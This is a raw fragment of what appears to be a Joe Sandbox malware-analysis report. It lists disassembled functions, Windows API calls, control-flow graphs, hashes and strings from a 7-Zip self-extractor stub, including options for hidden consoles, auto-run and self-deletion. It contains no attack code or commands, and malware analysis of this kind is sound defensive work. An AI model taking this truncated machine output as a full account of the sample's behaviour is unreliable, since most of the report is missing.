401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188
                          APIs
                            • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                            • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                            • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                            • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                            • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                            • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                            • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                          • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                          • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                            • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                            • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                          • _wtol.MSVCRT ref: 0040509F
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                          • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                          • _wtol.MSVCRT ref: 00405217
                          • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                            • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                            • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                            • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                            • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                            • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                            • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                            • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                            • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                            • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                            • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                            • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                            • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                          • wsprintfW.USER32 ref: 00405595
                          • _wtol.MSVCRT ref: 004057DE
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                          • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                          • CoInitialize.OLE32(00000000), ref: 004059E9
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                          • GetKeyState.USER32(00000010), ref: 00405AA1
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                          • memset.MSVCRT ref: 004060AE
                          • ShellExecuteExW.SHELL32(?), ref: 0040617E
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                          • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                            • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                            • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                            • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                            • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                            • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                            • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                            • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                          • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                          • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                          • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                          • _wtol.MSVCRT ref: 00405F65
                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                          • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                          • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                          • API String ID: 154539431-3058303289
                          • Opcode ID: 3447839d119719d05016a7f05a564b7be075a38f3dc1eabf80374ede3987d6c4
                          • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                          • Opcode Fuzzy Hash: 3447839d119719d05016a7f05a564b7be075a38f3dc1eabf80374ede3987d6c4
                          • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017eb call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 710->697 716 4017f1-4017f3 710->716 715 401804-401809 711->715 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                          • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                          • Opcode Fuzzy Hash: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                          • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                          • SetLastError.KERNEL32(00000010), ref: 0040303D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLast
                          • String ID:
                          • API String ID: 1799206407-0
                          • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                          • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                          • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                          • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                          APIs
                          • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                          • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: DiskFreeMessageSendSpace
                          • String ID:
                          • API String ID: 696007252-0
                          • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                          • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                          • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                          • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                          • String ID: HpA
                          • API String ID: 801014965-2938899866
                          • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                          • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                          • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                          • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                          Control-flow Graph

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                          • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
